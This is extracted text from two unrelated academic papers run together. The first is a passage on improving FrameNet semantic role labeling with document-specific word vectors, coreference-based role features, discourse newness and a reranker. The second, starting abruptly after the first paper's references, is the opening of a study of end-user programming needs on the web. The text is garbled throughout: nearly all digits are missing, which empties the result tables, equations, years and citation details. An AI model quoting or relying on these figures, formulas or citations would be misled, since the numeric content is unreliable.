(typically represented by co-occurrence counts) of linguistic entities such as words and phrases (sahlgren, ). although the absolute meaning of distributional representations remains unclear, they have proven highly success- ful for modeling relative aspects of meaning, as re- quired for instance in word similarity tasks (mikolov et al., ; pennington et al., ). given their ability to model lexical similarity, it is not surpris- ing that such representations are also successful at representing similar words in semantic tasks related to role labeling (pennacchiotti et al., ; croce et al., ; zapirain et al., ). although distributional representations can be used directly as features for role labeling (padó et al., ; gorinski et al., ; roth and wood- send, , inter alia), further gains should be possi- ble when considering document-specific properties such as genre and context. this is particularly true in the context of framenet, where different senses are observed across a diverse range of texts includ- ing spoken dialogue and debate transcripts as well country frame frame element iran supply recipient commerce buy buyer china supply supplier commerce sell seller iraq locative relation ground arriving goal table : most frequent roles assigned to country names appearing framenet texts: whereas iran and china are mostly mentioned in an economic context, references to iraq are mainly found in a news article about a politician’s visit to the country. as travel guides and newspaper articles. country names, for example, can be observed as fillers for different roles depending on the text genre and its perspective. whereas some text may talk about a country as an interesting holiday destination (e.g., “berlitz intro to jamaica”), others may discuss what a country is good at or interested in (e.g., “iran [nu- clear] introduction”). a list of the most frequent roles assigned to different country names are dis- played in table . previous approaches model word meaning in con- text (thater et al., ; dinu and lapata, , in- ter alia) using sentence-level information which is already available in traditional srl systems in the form of explicit features. here, we go one step fur- ther and define a simple model in which word mean- ing representations are adapted to each document. as a starting point, we use the glove toolkit (pen- nington et al., ) for learning representations and apply it to the wikipedia corpus made available by the westbury lab. the learned representations can be seen as word vectors whose components en- code basic bits of related encyclopaedic knowledge. we adapt these general representations to the ac- tual meaning of a word in a particular text by run- ning additional iterations of the glove toolkit us- ing document-specific co-occurrences as input and wikipedia-based representations for initialization. we selected this toolkit in our work due to its flexibility: as it directly operates over co-occurrence matrices, we can manip- ulate counts prior to word vector computation and easily take into account multiple matrices. http://www.psych.ualberta.ca/˜westburylab/ downloads/westburylab.wikicorp.download.html to make up for the large difference in data size be- tween the wikipedia corpus and a single document, we normalize co-occurrence counts based on the ra- tio between the absolute numbers of co-occurrences in both resources. given co-occurrence matrices cwiki and cd, and the vocabulary v , we formally define the features of our srl model as the components of the vec- tor space ~wi of words wi ( ≤ i ≤ |v |) occurring in document d. the representations are learned by applying glove to optimize the following objective for n iterations ( ≤ t ≤ n): jt = ∑ i,j f(xij)(~w t i ~wj − logxij) , ( ) where x = { cwiki if t < td cd otherwise ( ) the weighting function f scales the impact of each word pair such that unseen pairs do not contribute to the overall objective and frequent co-occurrences are not overweighted. in our experiments, we use the same weighting function and parametrization as defined in pennington et al. ( ). we further set the number of iterations to be performed on each co-occurrence matrix following results of an ini- tial cross-validation experiment on our training data (td = , n = ). . co-occurring roles if an entity is mentioned several times in discourse, it is likely that it also fills several roles. whereas the distributional model described in section . provides us with information regarding the role as- signments suitable for an entity given co-occurring words, we can also can explicitly consider previous role assignments to the same entity. as shown in table , a country that fills the supplier role is more likely to also fill the role of a seller than that of a buyer. given the high number of different frame elements in framenet, only a small fraction of pairs can be found in the training data, which entails that directly utilizing role co-occurrences might not be helpful. in order to benefit from previous role assignments in discourse, we follow related work on resolving implicit arguments (ruppenhofer et al., ; silberer and frank, ) and consider the se- mantic types of role assignments (see section ) as http://www.psych.ualberta.ca/~westburylab/downloads/westburylab.wikicorp.download.html http://www.psych.ualberta.ca/~westburylab/downloads/westburylab.wikicorp.download.html features instead of the role labels themselves. this tremendously reduces the feature space from more than , options (number of defined frame ele- ments) to just (number of semantic types ob- served for frame elements in the training data). in practice, we define one binary indicator fea- ture fs for each semantic type s observed at train- ing time. given a potential filler, we set the feature value of fs to (otherwise ) if and only if there ex- ists a co-referent entity mention annotated as a frame element filler with semantic type s. since texts in framenet do not contain any manual mark-up of coreference relations, we rely on entity mentions and coreference chains predicted by the stanford coreference resolution system (lee et al., ). . discourse newness our third contextual feature type is based on the observation that the salience of a discourse entity and its semantic prominence are interrelated. previ- ous work (rose, ) showed that semantic promi- nence, as signal-led by semantic roles, can better explain subsequent phenomena related to discourse salience (such as pronominalization) than syntactic indicators. our question here is whether this insight can be also applied in reverse. can information on discourse salience be useful as an indicator for se- mantic roles? for this feature, we make use of the same coref- erence chains as predicted for determining co- occurring roles. unfortunately, automatically pre- dicted mentions and coreference chains are noisy. to identify particularly reliable indicators for dis- course salience, we inspected held-out development data. one such indicator is whether an entity is men- tioned for the first time (discourse-new) or has been mentioned before (discourse-old). let w denote an entity and r ...rn the set of all co-reference chains with mentions r ...rm ∈ ri ( ≤ i ≤ n) ordered by their appearance in text. we define discourse newness based on head words r.head as: ( )new(w) = { if ∃rj ∈ ri : j > ∧rj.head ≡ w else although this feature is a simple binary indicator, it can be very useful for distinguishing between roles that are more or less likely to be assigned to new frame frame element new/old statement speaker . message . medium . leadership leader . governed . intensionally create creator . created entity . table : frequent frames that have elements with differ- ent likelihoods of discourse-new vs. discourse-old fillers; new/old ratios as observed on the development set. entities. for example, it is easy to imagine that the result of a causation is more likely to be discourse-new than the effect that caused it. ta- ble provides an overview of frames found in the training and development data which have roles with substantially different likelihoods for discourse-new fillers. . frame-based reranking our goal is to learn a better model for framenet- based semantic role labeling using linguistically in- spired features such as those described in the previ- ous sections. to do this, we need a framework for representing single role assignments and a model of how such assignments depend on each other within a frame instance. inspired by previous work on reranking in srl, we assume that we can find the correct filler of a frame element based on the top k roles predicted for each candidate word sequence. we leverage this assumption to train a reranking model that considers the top predictions for each candidate and uses all relevant features to select the best overall structure. our implementation of the reranking model is an adaptation of the reranker made available in the mate-tools (see section ), which we extend to deal with frame-specific features and arbitrary role la- bels. as features for the global component, we apply all local features and additionally use the following two types of indicator features on the whole frame structure: • total number of roles in the predicted structure • ordered set of predicted role labels frames srl model p r f gold semafor . . . ∗ gold framat . . . ∗ gold framat+context . . . semafor semafor . . . ∗ semafor framat . . . ∗ semafor framat+context . . . table : full structure prediction results using gold (top) and predicted frames (bottom). all numbers are per- centages. ∗ significantly different (p< . ) from framat+context. at test time, the reranker takes as input the n-best la- bels for the m-best fillers of a frame structure, com- putes a global score for each of the n × m possible combinations and returns the structure with the high- est overall score as its prediction output. based on initial experiments on our training data, we set these parameters to m = and n = . experiments in this section, we demonstrate the usefulness of contextual features for framenet-based srl mod- els. our hypothesis is that contextual information can considerably improve an existing semantic role labeling system. accordingly, we test this hypothe- sis based on the output of three different systems. the first system, henceforth called framat (short for framenet-adapted mate-tools) is the baseline system described in section . the second sys- tem, henceforth framat+context, is an enhanced ver- sion of the baseline that additionally uses all exten- sions described in section . finally, we also con- sider the output of semafor (das et al., ), a state-of-the-art model for frame-semantic role label- ing. although all systems are provided with entire documents as input, semafor and framat pro- cess each document sentence-by-sentence whereas framat+context also uses features over all sentences. for evaluation, we use the same framenet train- ing and evaluation texts as established in das and smith ( ). we compute precision, recall and f -score using the modified semeval- scorer from the semafor website. http://www.ark.cs.cmu.edu/semafor/eval/ results produced by running semafor on the exact same model/added feature p r f framat w/o reranker . . . +discourse newness . . . +word meaning vectors . . . +cooccurring roles . . . +reranker . . . +frame structure . . . table : full structure prediction results using gold frames, framat and different sets of context features. all numbers are percentages. results table summarizes our results with fra- mat, framat+context, and semafor using gold and predicted frames (see the upper and lower half of the table, respectively). although differences in system architecture lead to different precision/recall trade-offs for framat and semafor, both sys- tems achieve comparable f (for both gold and pre- dicted frames). compared to framat, we can see that the contextual enhancements implemented in our framat+context model lead to immediate gains of . points in recall, corresponding to a signifi- cant increase of . points in f . framat+context’s re- call is slightly below that of semafor ( . % vs. . %), however, it achieves a much higher level of precision ( . % vs. . %). we examined whether differences in performance among the three systems are significant using an ap- proximate randomization test over sentences (yeh, ). semafor and framat perform signifi- cantly worse (p< . ) compared to framat+context both when gold and predicted frames are used. in the remainder of this section we discuss results based on gold frames, since the focus of this work lies primar- ily on the role labeling task. impact of individual features we demonstrate the effect of adding individual context-based fea- tures to the framat model in a separate experiment. whereas all models in the previous experiment used a reranker for direct comparability, here we start with the framat baseline (without a reranker) and add each enhancement described in section in- crementally. as summarized in table , the base- line without a reranker achieves a precision and frame instances for training and testing as our own models. http://www.ark.cs.cmu.edu/semafor/eval/ recall of . % and . %, respectively. addi- tion of our discourse new feature increases pre- cision (+ . %), but also reduces recall (− . %). adding word meaning vectors compensates for the loss in recall (+ . %) and further increases preci- sion (+ . %). information about role assignments to coreferring mentions increases recall (+ . %) while retaining the same level of precision. finally, we can see that jointly considering role labeling decisions in a global reranker with additional fea- tures on frame structure leads to the strongest boost in performance, with combined additional gains in precision and recall of + . % and + . %, respec- tively. interestingly, the gains realized here are much higher compared to when adding the reranker to the framat model without contextual features, which corresponds to a + . % increase in precision but a − . % reduction in recall. general vs. document-specific vectors we also assessed the impact of adapting vectors to docu- ments (see table ). specifically, we compared a version of the framat+context model without any vectors against a model using the adaptation tech- nique presented in section . and a simpler alterna- tive which obtains glove representations trained on the wikipedia corpus and framenet texts. the lat- ter model does not explicitly take document infor- mation into account, but it should be able to yield vectors representative of the framenet domains, merely by being trained on them. as shown in ta- ble , our adaptation technique is superior to learn- ing word representations based on wikipedia and all framenet texts at once. using the components of document-specific vectors as features improves precision and recall by + . percentage points over framat+context without vectors. word representations trained on wikipedia and framenet improve preci- sion by + . percentage points and recall by + . . qualitative improvements in addition to quanti- tative gains, we also observe qualitative improve- ments when considering contextual features. a set of example predictions by different models are listed in table . the annotations show that framat and semafor mislabel several cases that are correctly classified by framat+context. in the first example, only framat+context is able to predict that on dec. fills the frame element model/word representations p r f framat+context without vectors . . . +document-specific vectors . . . +general (wiki+fn) vectors . . . table : full structure prediction results using gold frames, framat+context and different vector representa- tions. all numbers are percentages. time. this may seem trivial at first glance but is actually remarkable as the word token dec neither occurs in the training data nor is well represented as a time expression in wikipedia. the only way the model is able to label this phrase correctly is by finding that corresponding word tokens are sim- ilarly distributed across the test document as other time expressions are in the training data. in the second and third examples, correct assignments re- quire some form of world knowledge which is not expressed within the respective sentences but might be approximated based on context. for example, knowing that aunt, uncle and grandmother are role fillers of a kinship frame means that they are of the semantic type human and thus only compatible with the frame element recipient, not with goal. similarly, correctly classifying the relation between clinton and stooge in the last example is only possi- ble if the model has access to some information that makes clinton a likely filler of the superior role. we conjecture that document-specific word vector representations provide such information given that clinton co-occurs in the document with words such as president, chief, and claim. overall, we find that the features introduced in section model a fair amount of contextual in- formation which can help a semantic role labeling model to perform better decisions. discussion in this section, we discuss the extent to which our model leverages the full potential of contextual fea- tures for semantic role labeling. we manually ex- amine role assignments to frame elements which seem particularly sensitive to context. we analyze such frame elements based on differences in label assignment between framat and framat+context that can be traced back to factors such as agency in dis- semafor *can [he]theme gomotion [to paris]goal on dec. ? framat *can [he]theme gomotion [to paris on dec. ]goal ? framat+context can [he]theme gomotion [to paris]goal [on dec. ]time ? semafor *sendsending [my regards]theme to my aunt , uncle and grandmother . framat *sendsending [my regards]theme [to my aunt , uncle and grandmother]goal . framat+context sendsending [my regards]theme [to my aunt , uncle and grandmother]recipient . semafor *stephanopoulos does n’t want to seem a clinton stoogesubordinates and superiors framat *stephanopoulos doesn’t want to seem a [clinton]descriptor stoogesubordinates and superiors framat+context stephanopoulos does n’t want to seem a [clinton]superior stoogesubordinates and superiors table : examples of frame structures that are labeled incorrectly (marked by asterisks) without contextual features. course and word sense in context. we investigate whether our model captures these factors success- fully and showcase examples while reporting abso- lute changes in precision and recall. . agency and discourse many frame elements in framenet indicate agency, a property that we expect to highly correlate with contextual features on semantic types of assigned roles (see section . ) and discourse salience (see section . ). analysis of system output revealed that such features indeed affect and generally im- prove role labeling. considering all agent ele- ments across frames, we observe absolute improve- ments of % in precision and % in recall. in the fol- lowing, we provide a more detailed analysis of two specific frame elements: the low frequent agent element of the project frame and the highly fre- quent speaker element in the statement frame. the agent of a project is defined as the “individual or organization that carries out the project”. the main difficulty in identifying in- stances of this frame element is that the frame- evoking target word is typically a noun such as project, plan, or program and hence syntactic fea- tures on word-word dependencies do not provide sufficient cues. we found several cases where con- text provided missing cues, leading to an increase in recall from % to %. in cases where addi- tional features did not help, we identified two types of errors: firstly, the filler was too far from the tar- get word and therefore could not be identified as a filler at all (“[north korea]agent is developing ... programproject ”), and secondly, earlier men- tions indicating agency were not detected by the coreference resolution system (“the iaea assisted syria (...) this study was part of an iaeaagent .. programproject ). the speaker of a statement is defined as “the sentient entity that produces [a] message”. instances of the statement frame are frequently evoked by verbs such as say, mention, and claim. the speaker role can be hard to identify in sub- ject position as an unknown entity could also fill the medium role. for example, “a report claims that ...” should be analyzed differently from “a person claims”. our contextual features improve role label- ing in cases where the subject can be classified based on previous role assignments. on the negative side, we found our model to be too conservative in some cases where a subject is discourse new. additional gains would be possible with improved coreference chains that include pronouns such as some and i. such chains could be established through a better preprocessing pipeline or by utilizing additional lin- guistic resources. . word meaning and context as discussed earlier, we expect that the meaning of a word in context provides valuable cues regarding potential frame elements. two types of words are of particular interest here: ambiguous words, for which different senses might apply depending on context, and out-of-vocabulary words, for which no clear sense could be established during training. in the following, we take a closer look at differences in role assignment between framat and framat+context for such fillers. ambiguous words that occur as fillers of differ- ent frame elements in the test set include party, power, program, and view. we find occurrences of these words in two broad types of contexts: po- litical and non-political. within political contexts, party and power fill frame elements such as pos- session and leader. outwith political contexts, we find frame elements such as electricity and social event to be far more likely. the framat model exhibits a general bias towards the political domain, often missing instances of frame elements that are more common in non-political contexts (e.g., “the six-[party]interlocutors talksdiscussion ”). framat+context, in contrast, shows less of a bias and provides better classification based on context fea- tures for all frame elements. overall, precision for the four ambiguous words is improved from % to %, with a few errors remaining due to rare depen- dency paths (e.g., [program]act nmod←−−− which sbar←−− is prd←−−violationcompliance ) and differences between frame elements that depend on factors such as num- ber (cognizer vs. cognizer ). a frequently observed error by the baseline model is to assign peripheral frame elements such as time to role fillers that actually are not time expressions. this happens because words which have not been seen frequently during training but appear in adverbial positions are generally likely to fill the frame element time. we find that the use of document-specific word vector representations drastically reduces the number of such errors (e.g., “to givegiving [generously]manner vs. *time ”), with absolute gains in precision and recall of % and %, respectively, presumably because non-time expressions are often distributed differently across a document than time expressions. document- specific word vector representations also improve recall for out-of-vocabulary words, as seen with the example of dec discussed in section . however, such representations by themselves might be insuf- ficient to determine which aspects of a word sense are applicable across a document as occurrences in specific contexts may also be misleading (e.g., “. . . changes [throughout the community]” vs. “... [throughout the ages]time ”). some of these cases could be resolved using higher level features that explicitly model interactions between (predicted) word meaning in context and other factors, however we leave this to future work. conclusions in this paper, we enriched a traditional semantic role labeling model with additional information from context. the corresponding features we defined can be grouped into three categories: ( ) discourse-level features that directly utilize discourse knowledge in the form of coreference chains (newness, prior role assignments), ( ) sentence-level features that model properties of a frame structure as a whole, and ( ) lexical features that can be computed using methods from distributional semantics and an adaptation to model document-specific word meaning. to implement our discourse-level enhancements, we modified a semantic role labeling system de- veloped for propbank/nombank which we found to achieve competitive performance on framenet- based annotations. our main contribution lies in extending this system to the discourse level. our experiments revealed that discourse aware features can significantly improve semantic role labeling per- formance, leading to gains of over + . percent- age points in precision and state-of-the-art results in terms of f . analysis of system output revealed two reasons for improvement. firstly, contextual features provide necessary additional information to understand and assign roles on the sentence level, and secondly, some of our discourse-level features generalize better than traditional lexical and syntac- tic features. we further found that additional gains can be achieved using improved preprocessing tools and a more sophisticated model for feature inter- actions. in the future, we are planning to assess whether discourse-level features generalize cross- linguistically. we would also like to investigate whether semantic role labeling can benefit from rec- ognizing textual entailment and high-level discourse relations. our code is publicly available under http://github.com/microth/mateplus. acknowledgements we are grateful to diana mccarthy and three anony- mous referees whose feedback helped to substan- tially improve the present paper. the research pre- sented in this paper was funded by a dfg research fellowship (ro / - ). http://github.com/microth/mateplus references apoorv agarwal, sriramkumar balasubramanian, anup kotalwar, jiehan zheng, and owen rambow. . frame semantic tree kernels for social network extrac- tion from text. in proceedings of the th confer- ence of the european chapter of the association for computational linguistics, pages – , gothen- burg, sweden, – april . anders björkelund, bernd bohnet, love hafdell, and pierre nugues. . a high-performance syntac- tic and semantic dependency parser. in coling : demonstration volume, pages – , beijing, china. wanxiang che, ting liu, and yongqiang li. . im- proving semantic role labeling with word sense. in human language technologies: the annual conference of the north american chapter of the as- sociation for computational linguistics, pages – , los angeles, california, – june . bob coyne, alex klapheke, masoud rouhizadeh, richard sproat, and daniel bauer. . annotation tools and knowledge representation for a text-to-scene system. in proceedings of th international con- ference on computational linguistics, pages – , mumbai, india, – december . danilo croce, cristina giannone, paolo annesi, and roberto basili. . towards open-domain semantic role labeling. in proceedings of the th annual meet- ing of the association for computational linguistics, pages – , uppsala, sweden, – july . danilo croce, alessandro moschitti, and roberto basili. . structured lexical similarity via convolution kernels on dependency trees. in proceedings of the conference on empirical methods in natural language processing, pages – , edinburgh, united kingdom. dipanjan das and noah a. smith. . semi- supervised frame-semantic parsing for unknown pred- icates. in proceedings of the th annual meeting of the association for computational linguistics: hu- man language technologies, portland, oregon, – june . dipanjan das, desai chen, andré f. t. martins, nathan schneider, and noah a. smith. . frame-semantic parsing. computational linguistics, ( ): – . koen deschacht and marie-francine moens. . semi-supervised semantic role labeling using the la- tent words language model. in proceedings of the conference on empirical methods in natural language processing, pages – , singapore, – august . georgiana dinu and mirella lapata. . measuring distributional similarity in context. in proceedings of the conference on empirical methods in natural language processing, pages – , cambridge, massachusetts, – october . charles j. fillmore. . frame semantics and the na- ture of language. in annals of the new york academy of sciences: conference on the origin and develop- ment of language and speech, volume , pages – . william foland and james martin. . dependency- based semantic role labeling using convolutional neu- ral networks. in proceedings of the fourth joint conference on lexical and computational semantics, pages – , denver, colorado. matthew gerber and joyce chai. . semantic role labeling of implicit arguments for nominal predi- cates. computational linguistics, ( ): – . daniel gildea and daniel jurafsky. . automatic la- beling of semantic roles. computational linguistics, ( ): – . philip gorinski, josef ruppenhofer, and caroline sporleder. . towards weakly supervised resolu- tion of null instantiations. in proceedings of the th international conference on computational semantics (iwcs ) – long papers, pages – , potsdam, germany, – march . karl moritz hermann, dipanjan das, jason weston, and kuzman ganchev. . semantic frame identifica- tion with distributed word representations. in pro- ceedings of the nd annual meeting of the associa- tion for computational linguistics, pages – , baltimore, maryland, – june . fei huang and alexander yates. . open-domain semantic role labeling by modeling word spans. in proceedings of the th annual meeting of the associ- ation for computational linguistics, pages – , uppsala, sweden, – july . richard johansson and pierre nugues. . the ef- fect of syntactic representation on semantic role label- ing. in proceedings of the nd international con- ference on computational linguistics, pages – , manchester, united kingdom, – august . egoitz laparra and german rigau. . sources of ev- idence for implicit argument resolution. in proceed- ings of the th international conference on compu- tational semantics (iwcs ) – long papers, pages – , potsdam, germany, – march . heeyoung lee, angel chang, yves peirsman, nathanael chambers, mihai surdeanu, and dan jurafsky. . deterministic coreference resolution based on entity- centric, precision-ranked rules. computational lin- guistics, ( ): – . tao lei, yuan zhang, lluı́s màrquez, alessandro mos- chitti, and regina barzilay. . high-order low- rank tensors for semantic role labeling. in proceedings of the conference of the north american chapter of the association for computational linguistics: hu- man language technologies, pages – , den- ver, colorado. tomas mikolov, wen-tau yih, and geoffrey zweig. . linguistic regularities in continuous space word representations. in proceedings of the confer- ence of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – , atlanta, georgia, – june . alessandro moschitti. . a study on convolution kernels for shallow statistic parsing. in proceedings of the nd meeting of the association for computa- tional linguistics (acl’ ), main volume, pages – , barcelona, spain. sebastian padó, marco pennacchiotti, and caroline sporleder. . semantic role assignment for event nominalisations by leveraging verbal data. in pro- ceedings of the nd international conference on computational linguistics (coling ), pages – , manchester, united kingdom. marco pennacchiotti, diego de cao, roberto basili, danilo croce, and michael roth. . automatic induction of framenet lexical units. in proceedings of the conference on empirical methods in nat- ural language processing, pages – , honolulu, hawaii, usa, – october . jeffrey pennington, richard socher, and christopher manning. . glove: global vectors for word rep- resentation. in proceedings of the conference on empirical methods in natural language processing, pages – , doha, qatar, – october . ralph l rose. . joint information value of syntactic and semantic prominence for subsequent pronominal reference. salience: multidisciplinary perspectives on its function in discourse, : – . michael roth and kristian woodsend. . compo- sition of word representations improves semantic role labelling. in proceedings of the conference on empirical methods in natural language processing, pages – , doha, qatar, – october . josef ruppenhofer, michael ellsworth, miriam r. l. petruck, christopher r. johnson, and jan scheffczyk. . framenet ii: extended theory and practice. technical report, international computer science in- stitute, september . josef ruppenhofer, philip gorinski, and caroline sporleder. . in search of missing arguments: a linguistic approach. in proceedings of the inter- national conference recent advances in natural lan- guage processing , pages – , hissar, bul- garia, – september . magnus sahlgren. . the distributional hypothesis. italian journal of linguistics, ( ): – . dan shen and mirella lapata. . using semantic roles to improve question answering. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning (emnlp-conll), pages – , prague, czech republic. carina silberer and anette frank. . casting implicit role linking as an anaphora resolution task. in pro- ceedings of the first joint conference on lexical and computational semantics (*sem ), pages – , montréal, canada, - june. oscar täckström, kuzman ganchev, and dipanjan das. . efficient inference and structured learning for semantic role labeling. transactions of the associa- tion for computational linguistics, : – . stefan thater, hagen fürstenau, and manfred pinkal. . contextualizing semantic representations us- ing syntactically enriched vector models. in proceed- ings of the th annual meeting of the association for computational linguistics, pages – , uppsala, sweden, – july . kristina toutanova, aria haghighi, and christopher manning. . joint learning improves semantic role labeling. in proceedings of the rd annual meet- ing of the association for computational linguistics, pages – , ann arbor, michigan, – june . boyi xie, rebecca j. passonneau, leon wu, and germán g. creamer. . semantic frames to pre- dict stock price movement. in proceedings of the st annual meeting of the association for computational linguistics, pages – , sofia, bulgaria, – au- gust . nianwen xue and martha palmer. . calibrating features for semantic role labeling. in proceedings of the conference on empirical methods in natural language processing, pages – , barcelona, spain, july. alexander yeh. . more accurate tests for the sta- tistical significance of result differences. in proceed- ings of the th international conference on computa- tional linguistics, pages – , saarbrücken, ger- many. beñat zapirain, eneko agirre, lluı́s màrquez, and mi- hai surdeanu. . selectional preferences for se- mantic role classification. computational linguistics, ( ): – . submitted april accepted september published november corresponding author tak yeon lee, tylee@umd.edu academic editor harry hochheiser additional information and declarations can be found on page doi . /peerj-cs. copyright lee and bederson distributed under creative commons cc-by . open access give the people what they want: studying end-user needs for enhancing the web tak yeon lee and benjamin b. bederson human-computer interaction lab, computer science, university of maryland, college park, md, united states abstract end-user programming (eup) is a common approach for helping ordinary people create small programs for their professional or daily tasks. since end-users may not have programming skills or strong motivation for learning them, tools should provide what end-users want with minimal costs of learning –i.e., they must decrease the barriers to entry. however, it is often hard to address these needs, especially for fast-evolving domains such as the web. to better understand these existing and ongoing challenges, we conducted two formative studies with web users –a semi-structured interview study, and a wizard-of-oz study. the interview study identifies challenges that participants have with their daily experiences on the web. the wizard-of-oz study investigates how participants would naturally explain three computational tasks to an interviewer acting as a hypothetical computer agent. these studies demonstrate a disconnect between what end-users want and what existing eup systems support, and thus open the door for a path towards better support for end user needs. in particular, our findings include: ( ) analysis of challenges that end-users experience on the web with solutions; ( ) seven core functionalities of eup for addressing these challenges; ( ) characteristics of non- programmers describing three common computation tasks; ( ) design implications for future eup systems. subjects human–computer interaction keywords end-user programming, user study, wizard-of-oz study, world-wide web introduction over the decades, the web has become the most popular and convenient workbench for individuals and businesses supporting an incredible number of activities. however, developers of web services cannot completely anticipate future uses and problems at design time, when a service is developed. thus we can expect users, at use time, will discover misalignment between their needs and the support that an existing system can provide for them (fischer & giaccardi, ). numerous examples of this misalignment exist. for example, a site designed to support comparison-shopping for online shoppers may not meet the needs of shoppers who want to compare prices across different sites and even track daily prices (http://camelcamelcamel.com). another is that people often use customizable applications (e.g., rss feed readers) to manage ever-growing channels instead of visiting individual sites. more broadly, fraudulent sites and deceptive opinion spam are ongoing concerns for consumers (ott, cardie & hancock, ). when a web page does not match their needs, people often use mashups how to cite this article lee and bederson ( ), give the people what they want: studying end-user needs for enhancing the web. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:tylee@umd.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://camelcamelcamel.com http://dx.doi.org/ . /peerj-cs. (ennals et al., ; wong & hong, ; zang, rosson & nasser, ; zang & rosson, a; zang & rosson, b), browser extensions and scripts (bolin et al., ; leshed et al., ; miller et al., ; https://addons.mozilla.org/en-us/firefox/addon/ greasemonkey/) built by third-party programmers. unfortunately there are not enough third-party solutions to address all . billion end-user’s needs of million websites (toomim et al., ), and enabling end users to develop their own solutions is the goal of end-user programming on the web (webeup). a clear understanding of end-user needs is essential for building successful programming tools (rosson, ballin & rode, ). in this paper we report two user studies that address the following related research questions: ( ) what do end-users want to do; and ( ) how can we make programming tools easy for end-users without programming knowledge? answering these two questions is important to have a clearer understanding of the direction we should take to develop webeup systems that will be useful and effective for a broad range of people. prior studies (zang, rosson & nasser, ; zang & rosson, ; zang & rosson, b) characterize potential end-user programmer’s mindset and needs. researchers also investigated end-user programmer’s real world behavior and software artifacts they created with specific webeup tools such as coscripter (bogart et al., ). live collections such as the chrome web store (https://chrome.google.com/webstore/category/apps) and programmableweb (http://www.programmableweb.com/) are valuable resources that address user needs by community developed scripts and mashups. this paper reports on an interview study with similar motivations—to investigate what challenges end-users experience and how they would improve—but focuses on unmet needs of end-users on the web with minimal bias of current technology. through iterative coding we identify the pattern of challenges that end-users experience. we also suggest seven functionalities of eup for addressing the challenges—modify, compute, interactivity, gather, automate, store, and notify. there is a wealth of study for the second question—how to make webeup tools natural and easy to learn. researchers have studied the psychology of non-programmers. miller ( ) and miller ( ) examined natural language descriptions by non-programmers and identified a rich set of characteristics such as contextual referencing. biermann, ballard & sigmon ( ) confirmed that there are numerous regularities in the way non-programmers describe programs. pane, myers & ratanamahatana ( ) identified vocabulary and structure in non-programmer’s description of programs. we conducted a wizard-of- oz study with non-programmers to observe how they naturally explain common computational tasks through conversational dialogue with an intelligent agent. the interviewer acted as a hypothetical computer agent, who understands participant’s verbal statements, gestures, and scribbles. this study expands existing work with characteristics of non-programmers mental models. findings from the interviews and the wizard-of-oz study together demonstrate a disconnect between what end-users need from eup and what current systems support. in addition to identifying a set of important functionalities that should be included to best support end-users, our findings specifically highlight the needs of social platforms for lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/ https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/ https://chrome.google.com/webstore/category/apps http://www.programmableweb.com/ http://dx.doi.org/ . /peerj-cs. solving complex problems, and interactivity of programs created with eup tools to alleviate end-user’s concerns about using third-party programs. the wizard-of-oz study also shows that future eup tools should support multi-modal and mixed-initiative interaction for making programming more natural and easy-to-use. this paper makes the following contributions: ( ) identifying the current needs of end-user programming on the web; ( ) proposing features of future eup systems for addressing the needs of users on the web; ( ) characterizing non-programmer’s mental model of describing programming tasks; and ( ) proposing implications for designing end-user programming interfaces. related work end-user programming on the web over the last decade, researchers and companies have developed a large number of eup systems for the web (webeup). those webeup tools commonly took a combination of three approaches: scripting, visual programming, and inductive programming including programming-by-demonstration (cypher et al., ) and programming-by-example (lieberman, ). first, scripting languages for webeup (bolin et al., ; leshed et al., ; https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/) offer natural and domain-specific commands instead of machine-oriented general-purpose syntax of traditional languages such as c or java. however, end-users of script languages still need to memorize commands and type accurate details. in order to make programming more accessible to users without programming expertise, eup systems often employ visual programming techniques including drag-and-drop for organizing graphical widgets of operations, and flowcharts showing program structure (wong & hong, ; cameron & churchill, ). while visual programming techniques make programming more intuitive, they are usually less expressive and scalable than scripting languages. recent work employs inductive program synthesis techniques—such as programming- by-example and demonstration (cypher et al., ; gulwani, ; rinard, )— that enable end-users to express their needs via demonstrations and examples of what they are trying to accomplish, and the systems generate programs that are consistent with the examples. such programs include string manipulation (gulwani, ), text processing (yessenov et al., ), and geometric drawing (cheema, gulwani & laviola, ). especially for the web, the ‘‘reform’’ system (toomim et al., ) enables end-users to attach ui enhancements to arbitrary sites by selecting a few elements on the page. one approach (nichols & lau, ) enabled end users to re-author a simplified mobile version of web applications by demonstrating the task and directly choosing page elements. another system (macías & fabio, ) allowed users to modify the source code of a web page, and then created a generalized modification of similar pages. inductive programming has become a popular approach, since it requires little experience for users to provide examples and demonstration (rinard, ). nevertheless, even a highly sophisticated synthesis algorithm would be useless if end-users cannot naturally express high-quality examples. in the second study, we examine how users naturally express programming tasks, and explore potential issues and opportunities of symbiotic interaction. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/ http://dx.doi.org/ . /peerj-cs. understanding end-user programmers there is a wealth of existing work that has investigated end-user programmers from various perspectives. researchers have been interested in what set of functionalities are simple yet effective for a wide range of tasks. wong & hong ( ) surveyed popular mashups and identified common functionalities including aggregation, personalization, and real-time monitoring. zang & rosson ( ) and zang & rosson ( b) conducted surveys on potential end-user programmers to examine categories of potential mashup applications. in another study, zang & rosson ( ) investigated end-user’s mental models (e.g., where they search information for mashup), and how they use an existing mashup tool to build a simple mashup application. rosson, ballin & rode ( ) also examined differences between professional and informal web developers. our first interview study has similar motivations—to investigate what challenges end-users experience and how they would improve them. while the aforementioned work mostly focused on how existing tools and techniques had been perceived and used by end-user programmers, our interview examines unmet needs from challenges that ordinary people experience. end-user programmers face many challenges that professional programmers do, including understanding requirements, making design decisions, reusing and integrating existing code, managing versions, testing, and debugging (ko et al., ). cao et al. ( a) observed how end-user programmers make design decisions while using popfly, a mashup builder, and suggested implications for effective end-user programming environments. version control and debugging are inevitable parts of programming. kuttal, sarma & rothermel ( ) and kuttal, sarma & rothermel ( ) investigated how end-user programmers control different versions of programs they built and what support they require. cao et al. ( b) studied how end-users test and debug mashups through a process of successive refinement. a few studies recognized a wide spectrum of end- users, and assigned them different roles. for example, the reform system (toomim et al., ) enables (novice) users to apply enhancements developed by professional 